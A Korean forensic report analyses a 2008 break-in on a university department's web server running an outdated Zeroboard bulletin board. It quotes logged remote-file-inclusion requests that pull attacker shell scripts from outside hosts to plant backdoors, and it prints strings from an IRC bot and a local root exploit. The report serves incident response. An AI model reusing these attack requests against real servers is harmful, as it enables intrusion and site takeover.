<C0FCBACFB4EBC7D0B1B320C5E4B8F1B0F8C7D0B0FA20C0A5BCADB9F620BBE7B0EDBAD0BCAE2E687770>

Similar documents
휠세미나3 ver0.4

LXR 설치 및 사용법.doc

Remote UI Guide

Microsoft PowerPoint - o8.pptx

6주차.key

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

untitled

Deok9_Exploit Technique

SMB_ICMP_UDP(huichang).PDF

1217 WebTrafMon II

강의10

Page 2 of 6 Here are the rules for conjugating Whether (or not) and If when using a Descriptive Verb. The only difference here from Action Verbs is wh

Page 2 of 5 아니다 means to not be, and is therefore the opposite of 이다. While English simply turns words like to be or to exist negative by adding not,

Webtob( 멀티도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

hlogin2

Solaris Express Developer Edition

Secure Programming Lecture1 : Introduction

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

PowerPoint 프레젠테이션

Hi-MO 애프터케어 시스템 편 5. 오비맥주 카스 카스 후레쉬 테이블 맥주는 천연식품이다 편 처음 스타일 그대로, 부탁 케어~ Hi-MO 애프터케어 시스템 지속적인 모발 관리로 끝까지 스타일이 유지되도록 독보적이다! 근데 그거 아세요? 맥주도 인공첨가물이

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

0125_ 워크샵 발표자료_완성.key

슬라이드 1

R50_51_kor_ch1

github_introduction.key

hlogin7

<C7D1B9CEC1B7BEEEB9AEC7D03631C1FD28C3D6C1BE292E687770>

게시판 스팸 실시간 차단 시스템

해킹 대응 경진대회

2014_트렌드씨_웹용_1월_s

2 동북아역사논총 50호 구권협정으로 해결됐다 는 일본 정부의 주장에 대해, 일본군 위안부 문제는 일 본 정부 군 등 국가권력이 관여한 반인도적 불법행위이므로 한일청구권협정 에 의해 해결된 것으로 볼 수 없다 는 공식 입장을 밝혔다. 또한 2011년 8월 헌 법재판소는

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C4C656D70656C2D5A69762E637070>

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

*2008년1월호진짜

Observational Determinism for Concurrent Program Security

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

untitled

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Adobe Flash 취약점 분석 (CVE )

1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Mango220 Android How to compile and Transfer image to Target

/chroot/lib/ /chroot/etc/

Microsoft PowerPoint APUE(Intro).ppt

단계

본교재는수업용으로제작된게시물입니다. 영리목적으로사용할경우저작권법제 30 조항에의거법적처벌을받을수있습니다. [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase sta

Apache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Microsoft PowerPoint - 10Àå.ppt

2-11Àå

DocsPin_Korean.pages

Stage 2 First Phonics

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

인켈(국문)pdf.pdf

Apache install guide

ETL_project_best_practice1.ppt

퇴좈저널36호-4차-T.ps, page Preflight (2)

2008

»ç¿ëÀÚ¸Þ´º¾ó

망고100 보드로 놀아보자-4

1. 안드로이드개발환경설정 안드로이드개발을위해선툴체인을비롯한다양한소프트웨어패키지가필요합니다 툴체인 (Cross-Compiler) 설치 안드로이드 2.2 프로요부터는소스에기본툴체인이 prebuilt 라는이름으로포함되어있지만, 리눅스 나부트로더 (U-boot)

bn2019_2

K7VT2_QIG_v3

A+H/W-CH16

Microsoft PowerPoint - chap9 [호환 모드]

PowerPoint 프레젠테이션

GNU/Linux 1, GNU/Linux MS-DOS LOADLIN DOS-MBR LILO DOS-MBR LILO... 6

The_IDA_Pro_Book

<B1E2C8B9BEC828BFCFBCBAC1F7C0FC29322E687770>

<4D F736F F D20BDC7B9AB20B0FCB8AEC0DAB8A620C0A7C7D B8AEB4AABDBA20B1B8C3E020C7CFB1E22DB8F1C2F72E646F63>

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

Sena Device Server Serial/IP TM Version

PowerPoint 프레젠테이션

MySQL-Ch05

UDP Flooding Attack 공격과 방어

Dropbox Forensics

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

歯MW-1000AP_Manual_Kor_HJS.PDF


Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

chapter1,2.doc

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터

TTA Verified : HomeGateway :, : (NEtwork Testing Team)

디지털포렌식학회 논문양식

Secure Programming Lecture1 : Introduction

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù


public key private key Encryption Algorithm Decryption Algorithm 1

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

<31332DB9E9C6AEB7A2C7D8C5B72D3131C0E528BACEB7CF292E687770>

11¹Ú´ö±Ô

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

PowerPoint 프레젠테이션

BMP 파일 처리

Chap06(Interprocess Communication).PDF

untitled

Transcription:

전북대학교토목공학과웹서버사고분석 2008. 7. 31 전북대학교정보보안동아리 IS 신승용 (player0@chonbuk.ac.kr) 전북대학교토목공학과웹서버사고분석 1 of 9 07/31/2008

1. 시스템정보 주소 : civil.chonbuk.ac.kr (203.254.141.29) 소프트웨어환경 OS : Debian 3.0 (Woody : 2007.07.20) with Kernel 2.2.20 Webserver : apache 1.3.9 with PHP 4.1.2 ftpd : proftpd 1.2.8 sshd : opensshd 3.4p DBMS : mysql 3.23.49 웹페이지운영상황 zeroboard 4.1 pl5 (2004.12.28) 을설치하여운영중 (/var/www/bbs) 80/tcp 를통하여접근가능한경로에 zeroboard 4.0.0 pl4 (2001. 5. 24) 유지. (/var/www/zboard) chkrootkit, tripwire 등의루트킷감지프로그램및시스템무결성점검프로그램미설치 전북대학교토목공학과웹서버사고분석 2 of 9 07/31/2008

2. 분석내용 1. 최초 2008년 7월 28일토목공학과사무실에서메인페이지위변조확인 2. livecd 로부팅하여확인결과주요로그파일의내용삭제확인 (2008.05.03 18:00:00부터 2008.07.25 00:00:00 까지의모든로그삭제 ) 이로인하여, 정확한웹페이지위변조방법과접근경로의추측이어렵게됨삭제된로그시간대에침입이있었던것으로추정 3. 그이외시간대의로그들은 logrotate 에의해압축저장되어있었으며, 파일접근시간확인결과, 나머지로그파일들은외부로부터의수정은없었던것으로추정할수있었다. [ 그림 3], [ 그림 4], [ 그림 5] 참고 4. 이전로그확인결과, 2008년 1월 22일 15:39:20 (85.214.144.156) 에서대상서버로 zeroboard 4.1 의 PHP Injection 을시도하였으며, 공격성공을확인 85.214.114.156 [22/Jan/2008:15:39:20 +0900] 200 GET /bbs//skin/zero_vote/ask_password.php?dir=http://heartlandcandles.org/ca rt/list.txt??? HTTP/1.1 5. 17:26:21 backdoor (o.txt) 최초설치 (196.206.93.111) (/var/www/bbs) 196.206.93.111 [22/Jan/2008:17:26:21 +0900] 200 GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buergerfunk-boch um.de/cmd.txt?http://sniffo.altervista.list.txt?&action=edit&chdir=/var/ww w/bbs/&file=o.txt HTTP/1.1 6. 17:57:32(196.206.93.111), 18:33:36(213.140.17.103) 에서추가 backdoor (aa.txt) 설치 (/var/www/%20%20%20%20%20%20%20/%20%20%20%20%20%20%20) 196.206.93.111 [22/Jan/2008:17:57:32 +0900] 200 GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buergerfunk-boch um.de/cmd.txt?http://sniffo.altervista.list.txt?&action=edit&chdir=/var/ww w/%20%20%20%20%20%20%20/%20%20%20%20%20%20%20/&file=aa.t xt HTTP/1.1 213.140.17.103 [22/Jan/2008:18:33:36 +0900] 200 GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buergerfunk-boch um.de/cmd.txt?http://sniffo.altervista.list.txt?&action=edit&chdir=/var/ww w/%20%20%20%20%20%20%20/%20%20%20%20%20%20%20/&file=aa.t xt HTTP/1.1 전북대학교토목공학과웹서버사고분석 3 of 9 07/31/2008

7. 19:27:00 경 access_log 상에는발견되지않았으나 ircbot 이설치되어있었던것을삭제하는로그가확인되었으므로이전에 ircbot(iroffer) 이설치되어있던것으로추정된다. 84.223.206.68 [22/Jan/2008:19:27:34 +0900] 200 GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buergerfunk-boch um.de/cmd.txt?http://sniffo.altervista.list.txt?&action=del&chdir=/var/ww w/bbs/%20%20%20%20%20%20%20/%20%20%20%20%20%20%20/%20% 20../..%20%20/&file=linux&type=file HTTP/1.1 실제 1월 22일날짜로 ircbot(iroffer) 이설치되어있는것을확인. ( 파일이름 : linux) [ 그림 1] : ircbot 이설치된화면 ircbot 프로그램문자열일부추출 (linux) read from stdin failed: %s can't set terminal settings: %s can't get terminal settings: %s cannot use foreground mode on a non-terminal ** Window Size Changed To: %dx%d iroffer v1.3.b11 [Unknown] [MoD v3] by PMG, see http://iroffer.org/ Modded by Coloss - STRONGLY PRIVATE This Iroffer MoD has been created only for testing purpose. I'm not responsable for the other people that use this. It has to remain private because most of people don't know what 'testing purpose' means.. Fuck all script-kiddies and especially them of the warez-crews. Anyway I hope you 'll use it only for testing and LEGAL actions. If you want to know what are the new features of this iroffer well... look at the source code! And if you haven't it then probably you aren't autorizhed to have this 전북대학교토목공학과웹서버사고분석 4 of 9 07/31/2008

:) probably you have stolen it like a fucking lammahz. Grow up kiddie.. Knowledege is power! Coloss iroffer v1.3.b11 [Unknown] [MoD v3] by PMG, see http://iroffer.org/ Modded by Coloss - STRONGLY PRIVATE Usage: %s [-vdnc] [-f proc] [-m pwd] configfile -v Print version and exit. -d Print disclaimer and exit. -n Doesn't fork to background -c Generate encrypted password and exit. -f proc Fakes iroffer process with <proc> -m pwd Enter master password %s: [IrO MoD] error during faking process %s: [IrO MoD] error starting iroffer *** Error! Invalid Master Password! 8. access_log 과 error_log 에업로드결과가확인되지않았으나, 동일시간대에 bbs 디렉터리에 rootkit 이설치된것을보아 backdoor 를통한 rootkit 업로드가추정된다. rootkit 프로그램확인 (local) livecd:/var/www/bbs# ls local -al -rwxr-xr-x 1 www-data www-data 445808 1월 22 2008 local* livecd:/var/www/bbs# file local local: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped livecd:/var/www/bbs# 전북대학교토목공학과웹서버사고분석 5 of 9 07/31/2008

local 파일문자열일부추출 [-] %s: %s [-] Unable to exit, entering neverending loop. Kernel seems not to be vulnerable double allocation Unable to determine kernel address Unable to set up LDT Unable to change page protection Invalid LDT entry Unable to jump to call gate /bin/sh Unable to spawn shell PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate memory Unable to unmap stack Unable to expand BSS /dev/null TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_ Arena %d: system bytes = %10u in use bytes = %10u Total (incl. mmap): max mmap regions = %10u max mmap bytes = %10lu malloc: top chunk is corrupt free(): invalid pointer %p! malloc: using debugging hooks realloc(): invalid pointer %p! Unknown error apic mtrr 전북대학교토목공학과웹서버사고분석 6 of 9 07/31/2008

실제이 rootkit 이실행되었는지의기록은남아있지않으나, 이후남아있는 auth.log 의내용에서 nobody 에서 root 로 switch user 가발생하는기록이나오는것으로보아 rootkit 이정상적으로동작했음을짐작할수있다. [ 그림 2] : auth.log 에남아있는 nobody 의 root 로의유저변경기록 3. 조치내용 침해시스템은사고발견즉시네트워크에서분리시키고, 웹문서부분중악성코드삽입유무를확인한뒤새로운시스템에다시기록하도록권고하였다. 문제가발생하였던게시판프로그램은즉시제거하였으며, 새로운시스템에서는기존의보안적결함이없는게시판프로그램을사용하도록조치하였다. 4. 결론및대책 이번침해사고의특징은기존에문제가확인되었던웹응용프로그램의취약점을조기에조치하지못한상황에서침입탐지시스템등의부재및시스템관리자의관리소홀이불러올수있는문제점을보여준사례였다. 취약점이공개된소프트웨어의패치가관리자나, 사용자에의해즉시이루어졌다면, 시스템침해사고도발생하지않았을뿐만아니라, 그뒤이어발생한페이지위변조사고또한발생하지않았을것이다. 또한침입탐지시스템의부재가가져올수있는결과또한, 침해사고가발생한시스템이외부로크게문제점이보여지지않는한계속침해상태로유지된다는점또한보여준사례라할수있다. 이번사고를통해서얻어낼수있는결과는아래와같이요약될수있다. 시스템관리자또는사용자의보안의식강화및시기적절한응용프로그램의보안설정. 침입탐지시스템의필요성. 전북대학교토목공학과웹서버사고분석 7 of 9 07/31/2008

5. 참고자료 1. 이번사고에서사용된보안취약점에대한문서 Zeroboard DIR Parameter Remote File Include Vulnerabilities (2005.01.10) -> http://www.securityfocus.com/bid/12206/info STG 시큐리티보안권고문 (2004.11.31) -> http://www.securityfocus.com/archive/1/387076 전북대학교토목공학과웹서버사고분석 8 of 9 07/31/2008

2. 참고화면 [ 그림 3] : message log 의일정시간영역이삭제된화면 [ 그림 4] : access_log 의일정시간영역이삭제된화면 [ 그림 5] : error_log 의일정시간영역이일반적으로발생하지않는이벤트로기록된화면 전북대학교토목공학과웹서버사고분석 9 of 9 07/31/2008

2024 © docsplayer.org 개인정보보호 | 약관 | 지원